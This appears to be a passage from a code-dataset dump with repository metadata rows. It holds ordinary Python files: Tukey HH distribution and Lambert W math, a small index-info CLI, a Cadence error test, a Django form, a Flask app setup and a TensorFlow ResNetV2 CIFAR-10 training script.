# hh-Distributions through L-Moments and the L-Correlation," ISRN Applied
# Mathematics, vol. 2012, 2012. doi:10.5402/2012/980153
def tukey_hh_l_mean_and_scale(h_params):
"""Computes L-mean and L-scale for a Tukey HH distribution.
Args:
h_params: An np.array with dimension 2 on the first axis. The slice
h_params[0, ...] contains the left parameter of the distribution and
h_params[1, ...] the right parameter. Each entry h must in 0 <= h < 1.
Returns:
The tuple (L_mean, L_scale) containing the first two L-moments for the
given parameters. Each entry has the same shape as h_params, except for
the first axis, which is removed.
"""
one_div_sqrt2pi = 1.0 / np.sqrt(2.0 * np.pi)
hl = h_params[0, ...]
hr = h_params[1, ...]
dtype = h_params.dtype
l_1 = one_div_sqrt2pi * (1.0 / (hl - 1.0) + 1.0 / (1.0 - hr))
l_2 = one_div_sqrt2pi * (
(np.sqrt(2.0 - hl) + np.sqrt(2.0 - hr) - hl * np.sqrt(2.0 - hl) -
hr * np.sqrt(2 - hr)) /
((hl - 1.0) * (hr - 1.0) * np.sqrt((hl - 2.0) * (hr - 2.0))))
return (l_1.astype(dtype), l_2.astype(dtype))
def _tukey_hh_l_skewness_and_kurtosis(h_params):
"""Computes L-skewness and L-kurtosis for a Tukey HH distribution.
Args:
h_params: An np.array with dimension 2 on the first axis. The slice
h_params[0, ...] contains the left parameter of the distribution and
h_params[1, ...] the right parameter.
Returns:
The tuple (L_skewness, L_kurtosis) for the given parameters. Each entry
has the same shape as h_params, except for the first axis, which is
removed.
"""
def skewness_num(h1, h2):
return (12 * np.sqrt(2.0 - h1) * (h2 - 2.0) * (h2 - 1.0) *
np.arctan(1.0 / np.sqrt(2.0 - h1)))
def skewness_den(h):
return h * np.sqrt(2 - h) - np.sqrt(2 - h)
def kurtosis_den_part(h):
return h * np.sqrt(2.0 - h) - np.sqrt(2.0 - h)
hl = h_params[0, ...]
hr = h_params[1, ...]
dtype = h_params.dtype
skewness = (skewness_num(hl, hr) -
np.pi * (hl - hr) * (hl - 2.0) * (hr - 2.0) -
skewness_num(hr, hl)) / (
2 * np.pi * np.sqrt((hl - 2.0) * (hr - 2.0)) *
(skewness_den(hl) + skewness_den(hr)))
kurtosis_num_1 = (
hr * np.sqrt((hl - 4.0) * (hl - 2.0) * (hl - 1.0) * (hr - 2.0)) -
2.0 * np.sqrt((hl - 4.0) * (hl - 1.0)))
kurtosis_num_2 = (hl * (hl - 3.0) * np.sqrt((hl - 4.0) * (hl - 1.0)) +
np.sqrt((hl - 4.0) * (hl - 2.0) * (hl - 1.0) * (hr - 2.0)))
kurtosis_num_3 = (30.0 * (hl - 1.0) *
np.sqrt((hl - 4.0) * (hl - 2.0) * (hr - 2.0) / (hl - 1.0)) *
(hr - 1.0) * np.arctan(np.sqrt(1.0 + 2.0 / (hl - 4.0))))
kurtosis_num_4 = (30.0 * (hl - 2) *
np.sqrt((hl - 4.0) * (hl - 1.0)) * (hl - 1.0) *
np.arctan(np.sqrt(1.0 + 2.0 / (hr - 4.0))))
kurtosis_den = (np.pi * np.sqrt((4.0 - hl) * (2.0 - hl) * (1.0 - hl)) *
(kurtosis_den_part(hl) + kurtosis_den_part(hr)))
kurtosis = (6.0 * np.pi * (kurtosis_num_1 - kurtosis_num_2) +
kurtosis_num_3 + kurtosis_num_4) / kurtosis_den
return (skewness.astype(dtype), kurtosis.astype(dtype))
def _binary_search(error_fn, low_value, high_value):
"""Binary search for a function given start and end interval.
This is a simple binary search over the values of the function error_fn given
the interval [low_value, high_value]. We expect that the starting condition is
error_fn(low_value) < 0 and error_fn(high_value) > 0 and we bisect the
interval until the exit conditions are met. The result is the final interval
[low_value, high_value] that is normally much smaller than the initial one,
but still satisfying the starting condition.
Args:
error_fn: Function mapping values to errors.
low_value: Lower interval endpoint. We expect f(low_value) < 0.
high_value: Higher interval endpoint. We expect f(high_value) > 0.
Returns:
The final interval endpoints (low_value, high_value) after the sequence of
bisections.
"""
# Exit conditions.
stop_iter_step = 10 # Max number of iterations.
stop_error_step = 1e-6 # Minimum function variation.
stop_value_step = 1e-6 # Minimum variable variation.
current_iter = 0
while True:
current_value = (low_value + high_value) / 2.0
current_error = error_fn(current_value)
if current_error < 0.0:
low_value = current_value
else:
high_value = current_value
current_iter += 1
if (current_iter > stop_iter_step or
np.abs(current_error) < stop_error_step or
high_value - low_value < stop_value_step):
break
return low_value, high_value
def _params_to_errors(h, delta_h, l_skewness_and_kurtosis):
"""Maps parameters to errors on L-skewness and L-kurtosis.
Args:
h: Value of right parameter of the Tukey HH distribution.
delta_h: Different between right and left parameter of the Tukey HH
distribution.
l_skewness_and_kurtosis: np.array containing the target values of
L-skewness and L-kurtosis.
Returns:
An np.array containing the difference between the values of L-skewness and
L-kurtosis corresponding to the parameters hl = h - delta_h, hr =h and the
target values.
"""
dtype = l_skewness_and_kurtosis.dtype
h_params = np.array([h - delta_h, h], dtype=dtype)
current_l_skewness_and_kurtosis = np.array(
_tukey_hh_l_skewness_and_kurtosis(h_params), dtype=dtype)
return current_l_skewness_and_kurtosis - l_skewness_and_kurtosis
def compute_tukey_hh_params(l_skewness_and_kurtosis):
"""Computes the H paramesters of a Tukey HH distribution.
Given the L-skewness and L-kurtosis of a Tukey HH distribution we compute
the H parameters of the distribution.
Args:
l_skewness_and_kurtosis: A np.array with shape (2,) containing L-skewness
and L-kurtosis.
Returns:
An np.array with the same type and shape of the argument containing the
left and right H parameters of the distribution.
"""
# Exit conditions for the search loop.
stop_iter_step = 20 # Max number of iteration for the search loop.
stop_error_step = 1e-6 # Minimum function variation.
stop_value_step = 1e-6 # Minimum variable variation.
dtype = l_skewness_and_kurtosis.dtype
# Returns zero parameters (i.e. treat as gaussian) if L-kurtosis is smaller
# than for a gaussian.
result = np.zeros_like(l_skewness_and_kurtosis)
if l_skewness_and_kurtosis[1] < 0.1226017:
return result
# If L-skewness is negative, swap the parameters.
swap_params = False
if l_skewness_and_kurtosis[0] < 0.0:
l_skewness_and_kurtosis[0] = -l_skewness_and_kurtosis[0]
swap_params = True
l_skewness_and_kurtosis[1] = np.minimum(
l_skewness_and_kurtosis[1], 1.0 - 1.0e-5)
# If L-skewness is zero, left and right parameters are equal and there is a
# a closed form to compute them from L-kurtosis. We start from this value
# and then change them to match simultaneously L-skeweness and L-kurtosis.
# For that, we parametrize the search space with the array
# [h_rigth, h_right - h_left], i.e. the value of the right parameter and the
# difference right minus left paramerters. In the search iteration, we
# alternate between updates on the first and the second entry of the search
# parameters.
initial_h = 3.0 - 1.0 / np.cos(
np.pi / 15.0 * (l_skewness_and_kurtosis[1] - 6.0))
search_params = np.array([initial_h, 0.0], dtype=dtype)
# Current lower and upper bounds for the search parameters.
min_search_params = np.array([initial_h, 0.0], dtype=dtype)
max_search_params = np.array([1.0 - 1.0e-7, initial_h], dtype=dtype)
current_iter = 0
previous_search_params = np.zeros_like(search_params)
while current_iter < stop_iter_step:
# Search for L-skewness at constant h. Increase delta_h.
error_skewness = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
search_params[0], x, l_skewness_and_kurtosis)[0]
if error_skewness(max_search_params[1]) > 0.0:
low_delta_h, high_delta_h = _binary_search(
error_skewness, min_search_params[1], max_search_params[1])
search_params[1] = high_delta_h
max_search_params[1] = high_delta_h # The new delta is an upperbound.
upperbound_delta_found = True
else:
search_params[1] = max_search_params[1]
min_search_params[1] = max_search_params[1] # No solution: lowerbound.
upperbound_delta_found = False
# Search for L-kurtosis at constant possibly overestimated delta.
error_kurtosis = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
x, search_params[1], l_skewness_and_kurtosis)[1]
low_h, high_h = _binary_search(
error_kurtosis, min_search_params[0], max_search_params[0])
if upperbound_delta_found:
search_params[0] = high_h
max_search_params[0] = high_h # Delta overestimated: upperbound for h.
else:
search_params[0] = low_h
min_search_params[0] = low_h # Delta underestimated: lowerbound for h.
max_search_params[1] = low_h # Delta not found, search on full range.
if upperbound_delta_found: # If not found, we repeat the first 2 steps.
# Otherwise, Search for delta at constant overestimated h.
error_skewness = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
search_params[0], x, l_skewness_and_kurtosis)[0]
low_delta_h, high_delta_h = _binary_search(
error_skewness, min_search_params[1], max_search_params[1])
search_params[1] = low_delta_h
min_search_params[1] = low_delta_h
# Search for h at constant delta.
error_kurtosis = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
x, search_params[1], l_skewness_and_kurtosis)[1]
low_h, high_h = _binary_search(
error_kurtosis, min_search_params[0], max_search_params[0])
search_params[0] = low_h
min_search_params[0] = low_h
current_error = _params_to_errors(
search_params[0], search_params[1], l_skewness_and_kurtosis)
delta_search_params = search_params - previous_search_params
current_iter += 1
previous_search_params = search_params.copy()
if (np.all(np.abs(current_error) < stop_error_step) or
np.all(np.abs(delta_search_params) < stop_value_step)):
break
result[0] = search_params[0] - search_params[1]
result[1] = search_params[0]
if swap_params:
result = result[::-1]
return result
def lambert_w(x):
"""Computes the Lambert W function of a `Tensor`.
Computes the principal branch of the Lambert W function, i.e. the value w such
that w * exp(w) = x for a a given x. For the principal branch, x must be real
x >= -1 / e, and w >= -1.
Args:
x: A `Tensor` containing the values for which the principal branch of
the Lambert W function is computed.
Returns:
A `Tensor` with the same shape and dtype as x containing the value of the
Lambert W function.
"""
dtype = x.dtype
e = tf.constant(np.exp(1.0), dtype)
inv_e = tf.constant(np.exp(-1.0), dtype)
s = (np.exp(1) - 1.0) / (np.exp(2) - 1.0)
slope = tf.constant(s, dtype)
c = tf.constant(1 / np.exp(1) * (1 - s), dtype)
log_s = tf.math.log(x)
w_init = tf.where(
x < inv_e,
x,
tf.where(x < e,
slope * x + c,
(log_s + (1.0 / log_s - 1.0) * tf.math.log(log_s))))
def newton_update(count, w):
expw = tf.math.exp(w)
wexpw = w * expw
return count + 1, w - (wexpw - x) / (expw + wexpw)
count = tf.constant(0, tf.int32)
num_iter = tf.constant(8)
(unused_final_count, w) = tf.while_loop(
lambda count, w: tf.less(count, num_iter),
newton_update,
[count, w_init])
return w
def inverse_tukey_hh(x, hl, hr):
"""Compute the inverse of the Tukey HH function.
The Tukey HH function transforms a standard Gaussian distribution into the
Tukey HH distribution and it's defined as:
x = u * exp(hl * u ^ 2) for u < 0 and x = u * exp(hr * u ^ 2) for u >= 0.
Given the values of x, this function computes the corresponding values of u.
Args:
x: The input `Tensor`.
hl: The "left" parameter of the distribution. It must have the same dtype
and shape of x (or a broadcastable shape) or be a scalar.
hr: The "right" parameter of the distribution. It must have the same dtype
and shape of x (or a broadcastable shape) or be a scalar.
Returns:
The inverse of the Tukey HH function.
"""
def one_side(x, h):
h_x_square = tf.multiply(h, tf.square(x))
return tf.where(
# Prevents the 0 / 0 form for small values of x..
tf.less(h_x_square, 1.0e-7),
x, # The error is < 1e-14 for this case.
tf.sqrt(tf.divide(lambert_w(h_x_square), h)))
return tf.where(tf.less(x, 0.0), -one_side(-x, hl), one_side(x, hr))
| [
"[email protected]"
]
| |
052d38a9978790d336591664f52e5c60fcab85f1 | eb24f4e5ef940e6c1d1c45a9dcce4d78bb88e6a2 | /bin/info | ea8acf20e49bf7d7cce9770f4ad2b6c7b0ce3013 | [
"MIT"
]
| permissive | eukaryote/knowhow | f7f8674a00f235a85945e51c4a3bc785e8db35e2 | 276439680e4075300d8001cae4f03d199f473991 | refs/heads/master | 2021-03-12T20:16:42.675120 | 2018-07-14T17:23:45 | 2018-07-14T17:23:45 | 19,190,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,317 | #!/usr/bin/env python
# vim: set ft=python: fileencoding=utf8
"""Show information about the knowhow index.
Usage:
info
info -h | --help
Options:
-h --help Show this screen.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import sys
from docopt import docopt
from knowhow.index import Index
def print_overview(index):
"""Print overview of index to stdout."""
_ix = index.ix
print("Index:", _ix.storage.folder)
print("Last updated:", index.last_modified(localize=True))
print("Repo size: %d snippet(s)" % _ix.doc_count())
print()
def print_details(index):
"""Print details of index to stdout."""
with index.ix.reader() as reader:
tags = (t.decode("utf-8") for t in reader.lexicon("tag"))
print("tags:", ", ".join(tags))
print("most frequent tags:")
for count, term in reader.most_frequent_terms("tag"):
print(" {0}: {1}".format(int(count), term.decode("utf-8")))
def main(_args):
"""Run 'info' main, printing overview and details of index to stdout."""
index = Index()
print_overview(index)
print_details(index)
return 0
if __name__ == "__main__":
sys.exit(main(docopt(__doc__)))
| [
"[email protected]"
]
| ||
1ced0778202d32bf5b35354803964d6939afc6ea | 9ac35a2327ca9fddcf55077be58a1babffd23bdd | /cadence/tests/test_errors.py | 6921b0a8d11e06f2d032e6cc1b4e6d0ef653cd7c | [
"MIT"
]
| permissive | meetchandan/cadence-python | f1eb987c135f620607a62495096a89494216d847 | cfd7a48e6da7c289c9ae0c29c94d12d2b05986e4 | refs/heads/master | 2022-12-14T12:46:32.364375 | 2020-09-16T15:50:55 | 2020-09-16T15:50:55 | 260,763,097 | 1 | 0 | MIT | 2020-09-16T15:48:14 | 2020-05-02T19:47:56 | Python | UTF-8 | Python | false | false | 1,347 | py | from unittest import TestCase
from cadence.errors import find_error, InternalServiceError, WorkflowExecutionAlreadyStartedError
from cadence.thrift import cadence_thrift
class TestError(TestCase):
def setUp(self) -> None:
self.internalServiceError = cadence_thrift.shared.InternalServiceError("ERROR")
self.sessionAlreadyExistError = cadence_thrift.shared.WorkflowExecutionAlreadyStartedError("ERROR", "REQUEST-ID",
"RUN-ID")
def test_internal_server_error(self):
response = cadence_thrift.WorkflowService.StartWorkflowExecution.response(
internalServiceError=self.internalServiceError)
error = find_error(response)
self.assertIsInstance(error, InternalServiceError)
self.assertEqual("ERROR", error.message)
def test_session_already_exists_error(self):
response = cadence_thrift.WorkflowService.StartWorkflowExecution.response(
sessionAlreadyExistError=self.sessionAlreadyExistError)
error = find_error(response)
self.assertIsInstance(error, WorkflowExecutionAlreadyStartedError)
self.assertEqual("ERROR", error.message)
self.assertEqual("REQUEST-ID", error.start_request_id)
self.assertEqual("RUN-ID", error.run_id)
| [
"[email protected]"
]
| |
81ffe4f0c99da01a74045b38ea2219a0ae603926 | c9c1280de0467b66c346211eaedc2065b6633e4f | /request/forms.py | 8e0d0e25875872132cf37e7432788c2de89575c1 | []
| no_license | myklll/ehub | 1d4cdba50617d7b8ecd848285fa57e589db716cb | 8d697afe125cdd7e85fce8116fc86a2e216d48d4 | refs/heads/master | 2021-10-07T10:02:16.838681 | 2016-05-07T07:41:04 | 2016-05-07T07:41:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | from django import forms
from django.forms.models import inlineformset_factory
from .models import Request
from inquiry.models import *
class RequestForm(forms.ModelForm):
class Meta:
model = Request
exclude = ("listing","owner",)
#event = forms.ModelChoiceField(queryset=Inquiry.objects.filter(owner=kwargs.pop('user')))
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
super(RequestForm, self).__init__(*args, **kwargs)
qs = Inquiry.objects.filter(owner=user)
#self.fields['events'] = forms.ModelChoiceField(queryset=qs)
self.fields['event'].queryset = Inquiry.objects.filter(owner=user)
| [
"[email protected]"
]
| |
40f876fcc02752f5a490da1b62c9a5389df9746a | ef7984977e3470081339df3bee9105c16c79421d | /p1/app/__init__.py | 949fc65c867b0efb44713cc4f4d5a5fad74f89a9 | []
| no_license | stevenhughes08/PiBlog | d145d29f91161c401ce29da344159e8b2bd36264 | 9c93083d9bff4fe69116886d5c6d19ee917ec0a3 | refs/heads/master | 2020-12-01T15:53:38.627025 | 2020-01-03T03:06:57 | 2020-01-03T03:06:57 | 230,689,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
from app import routes, models
| [
"[email protected]"
]
| |
7249e9e066e96a76e820a257252789e68f35d811 | 3c8155ad1e44047b17231358d8a4f0df0ea8bfee | /Code/xNNs_Code_030_CIFAR_ResNetV2b.py | 1ed9a7c92cdb9d168304a3fb8a457b460a1ba12e | []
| no_license | nambiarvijay/UT-Dallas-CS-6301-CNNs | 91aab77f34797cdaa9e4aa216fc5c3daea8ea1e5 | d14039133cac9555e2e885fedd8e68c172a01623 | refs/heads/master | 2020-09-28T05:15:16.783852 | 2019-12-05T03:50:55 | 2019-12-05T03:50:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,352 | py | ################################################################################
#
# xNNs_Code_030_CIFAR_ResNetV2b.py
#
# DESCRIPTION
#
# TensorFlow image classification using CIFAR using a ResNetV2 based encoder
# with 2x the number of channels per layer relative to the ResNetV2 implemented
# in xNNs_Code_030_CIFAR_ResNetV2.py
#
# INSTRUCTIONS
#
# 1. Go to Google Colaboratory: https://colab.research.google.com/notebooks/welcome.ipynb
# 2. File - New Python 3 notebook
# 3. Cut and paste this file into the cell (feel free to divide into multiple cells)
# 4. Runtime - Change runtime type - Hardware accelerator - GPU
# 5. Runtime - Run all
#
# NOTES
#
# 1. This configuration achieves 93.0% accuracy in 60 epochs with each epoch
# taking ~ 140s on Google Colab. Accuracy can be improved via
# - Improved training data augmentation
# - Improved network design
# - Improved network training
#
# 2. Examples (currently commented out) are included for the following
# - Computing the dataset mean and std dev
# - Restarting training after a crash from the last saved checkpoint
# - Saving and loading the model in Keras H5 format
# - Saving and loading the model in TensorFlow SavedModel format
# - Getting a list of all feature maps
# - Creating an encoder only model
#
################################################################################
################################################################################
#
# IMPORT
#
################################################################################
# tensorflow 2.0 beta and tensorflow datasets
!pip install tensorflow-gpu==2.0.0-beta1
!pip install tensorflow-datasets
# tenorflow
import tensorflow as tf
from tensorflow import keras
# tensorflow datasets
import tensorflow_datasets as tfds
# additional libraries
import math
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
################################################################################
#
# PARAMETERS
#
################################################################################
# data
DATA_NUM_CLASSES = 10
DATA_CHANNELS = 3
DATA_ROWS = 32
DATA_COLS = 32
DATA_CROP_ROWS = 28
DATA_CROP_COLS = 28
DATA_MEAN = np.array([[[125.30691805, 122.95039414, 113.86538318]]]) # CIFAR10
DATA_STD_DEV = np.array([[[ 62.99321928, 62.08870764, 66.70489964]]]) # CIFAR10
# model
MODEL_LEVEL_0_BLOCKS = 4
MODEL_LEVEL_1_BLOCKS = 6
MODEL_LEVEL_2_BLOCKS = 3
# training
TRAINING_BATCH_SIZE = 32
TRAINING_SHUFFLE_BUFFER = 5000
TRAINING_BN_MOMENTUM = 0.99
TRAINING_BN_EPSILON = 0.001
TRAINING_LR_MAX = 0.001
# TRAINING_LR_SCALE = 0.1
# TRAINING_LR_EPOCHS = 2
TRAINING_LR_INIT_SCALE = 0.01
TRAINING_LR_INIT_EPOCHS = 5
TRAINING_LR_FINAL_SCALE = 0.01
TRAINING_LR_FINAL_EPOCHS = 55
# training (derived)
TRAINING_NUM_EPOCHS = TRAINING_LR_INIT_EPOCHS + TRAINING_LR_FINAL_EPOCHS
TRAINING_LR_INIT = TRAINING_LR_MAX*TRAINING_LR_INIT_SCALE
TRAINING_LR_FINAL = TRAINING_LR_MAX*TRAINING_LR_FINAL_SCALE
# saving
SAVE_MODEL_PATH = './save/model/'
!mkdir -p "$SAVE_MODEL_PATH"
################################################################################
#
# DATA
#
################################################################################
# pre processing for training data
def pre_processing_train(example):
# extract image and label from example
image = example["image"]
label = example["label"]
# image is cast to float32, normalized, augmented and random cropped
# label is cast to int32
image = tf.math.divide(tf.math.subtract(tf.dtypes.cast(image, tf.float32), DATA_MEAN), DATA_STD_DEV)
image = tf.image.random_flip_left_right(image)
image = tf.image.random_crop(image, size=[DATA_CROP_ROWS, DATA_CROP_COLS, 3])
label = tf.dtypes.cast(label, tf.int32)
# return image and label
return image, label
# pre processing for testing data
def pre_processing_test(example):
# extract image and label from example
image = example["image"]
label = example["label"]
# image is cast to float32, normalized, augmented and center cropped
# label is cast to int32
image = tf.math.divide(tf.math.subtract(tf.dtypes.cast(image, tf.float32), DATA_MEAN), DATA_STD_DEV)
image = tf.image.crop_to_bounding_box(image, (DATA_ROWS - DATA_CROP_ROWS) // 2, (DATA_COLS - DATA_CROP_COLS) // 2, DATA_CROP_ROWS, DATA_CROP_COLS)
label = tf.dtypes.cast(label, tf.int32)
# return image and label
return image, label
# download data and split into training and testing datasets
dataset_train, info = tfds.load("cifar10", split=tfds.Split.TRAIN, with_info=True)
dataset_test, info = tfds.load("cifar10", split=tfds.Split.TEST, with_info=True)
# debug - datasets
# print(dataset_train) # <_OptionsDataset shapes: {image: (32, 32, 3), label: ()}, types: {image: tf.uint8, label: tf.int64}>
# print(dataset_test) # <_OptionsDataset shapes: {image: (32, 32, 3), label: ()}, types: {image: tf.uint8, label: tf.int64}>
# training data mean
# num_elem = 0.0
# data_mean = np.array([0.0, 0.0, 0.0])
# for elem in dataset_train:
# z = np.copy(tf.dtypes.cast(elem["image"], tf.float32))
# data_mean = data_mean + np.mean(z, axis=(0, 1))
# num_elem = num_elem + 1.0
# data_mean = data_mean/num_elem
# data_mean = data_mean.reshape(1, 1, 3)
# print(data_mean)
# training data std dev
# num_elem = 0.0
# data_std = np.array([0.0, 0.0, 0.0])
# for elem in dataset_train:
# z = np.copy(tf.dtypes.cast(elem["image"], tf.float32))
# data_std = data_std + np.sum((z - data_mean)*(z - data_mean), axis=(0, 1))/float(DATA_ROWS*DATA_COLS)
# num_elem = num_elem + 1.0
# data_std = data_std/num_elem
# data_std = np.sqrt(data_std)
# data_std = data_std.reshape(1, 1, 3)
# print(data_std)
# transform training dataset
dataset_train = dataset_train.map(pre_processing_train, num_parallel_calls=4)
dataset_train = dataset_train.shuffle(buffer_size=TRAINING_SHUFFLE_BUFFER)
dataset_train = dataset_train.batch(TRAINING_BATCH_SIZE)
dataset_train = dataset_train.prefetch(buffer_size=1)
# transform testing dataset
dataset_test = dataset_test.map(pre_processing_test, num_parallel_calls=4)
dataset_test = dataset_test.batch(TRAINING_BATCH_SIZE)
dataset_test = dataset_test.prefetch(buffer_size=1)
# debug - datasets after transformation
# print(dataset_train) # <PrefetchDataset shapes: ((None, 28, 28, 3), (None,)), types: (tf.float32, tf.int32)>
# print(dataset_test) # <PrefetchDataset shapes: ((None, 28, 28, 3), (None,)), types: (tf.float32, tf.int32)>
################################################################################
#
# MODEL
#
################################################################################
# create and compile model
def create_model(rows, cols, channels, level_0_blocks, level_1_blocks, level_2_blocks, num_classes, lr_initial):
# encoder - input
model_input = keras.Input(shape=(rows, cols, channels), name='input_image')
x = model_input
# encoder - tail
x = keras.layers.Conv2D(32, 3, strides=1, padding='same', activation=None, use_bias=False)(x)
# encoder - level 0 - special bottleneck - repeat 1x
# input
# tensor: 28 x 28 x 32
# residual path
# filter: 32 x 1 x 1 x 32
# filter: 32 x 3 x 3 x 32
# filter: 128 x 1 x 1 x 32
# main path
# filter: 128 x 1 x 1 x 32
# output
# tensor: 28 x 28 x 128
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(x)
x = keras.layers.Add()([x, residual])
# encoder - level 0 - standard bottleneck - repeat (level_0_blocks - 1)x
# input
# tensor: 28 x 28 x 128
# residual path
# filter: 32 x 1 x 1 x 128
# filter: 32 x 3 x 3 x 32
# filter: 128 x 1 x 1 x 32
# main path
# filter: identity
# output
# tensor: 28 x 28 x 128
for n0 in range(level_0_blocks - 1):
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(32, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Add()([x, residual])
# encoder - level 1 - down sampling bottleneck - repeat 1x
# input
# tensor: 28 x 28 x 128
# residual path
# filter: 64 x 1 x 1 x 128 / 2
# filter: 64 x 3 x 3 x 64
# filter: 256 x 1 x 1 x 64
# main path
# filter: 256 x 1 x 1 x 128 / 2
# output
# tensor: 14 x 14 x 256
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 1, strides=2, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(256, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Conv2D(256, 1, strides=2, padding='same', activation=None, use_bias=False)(x)
x = keras.layers.Add()([x, residual])
# encoder - level 1 - standard bottleneck - repeat (level_1_blocks - 1)x
# input
# tensor: 14 x 14 x 256
# residual path
# filter: 64 x 1 x 1 x 256
# filter: 64 x 3 x 3 x 64
# filter: 256 x 1 x 1 x 64
# main path
# filter: identity
# output
# tensor: 14 x 14 x 256
for n1 in range(level_1_blocks - 1):
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(64, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(256, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Add()([x, residual])
# encoder - level 2 - down sampling bottleneck - repeat 1x
# input
# tensor: 14 x 14 x 256
# residual path
# filter: 128 x 1 x 1 x 256 / 2
# filter: 128 x 3 x 3 x 128
# filter: 512 x 1 x 1 x 128
# main path
# filter: 512 x 1 x 1 x 256 / 2
# output
# tensor: 7 x 7 x 512
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=2, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(512, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Conv2D(512, 1, strides=2, padding='same', activation=None, use_bias=False)(x)
x = keras.layers.Add()([x, residual])
# encoder - level 2 - standard bottleneck - repeat (level_2_blocks - 1)x
# input
# tensor: 7 x 7 x 512
# residual path
# filter: 128 x 1 x 1 x 512
# filter: 128 x 3 x 3 x 128
# filter: 512 x 1 x 1 x 128
# main path
# filter: identity
# output
# tensor: 7 x 7 x 512
for n2 in range(level_2_blocks - 1):
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
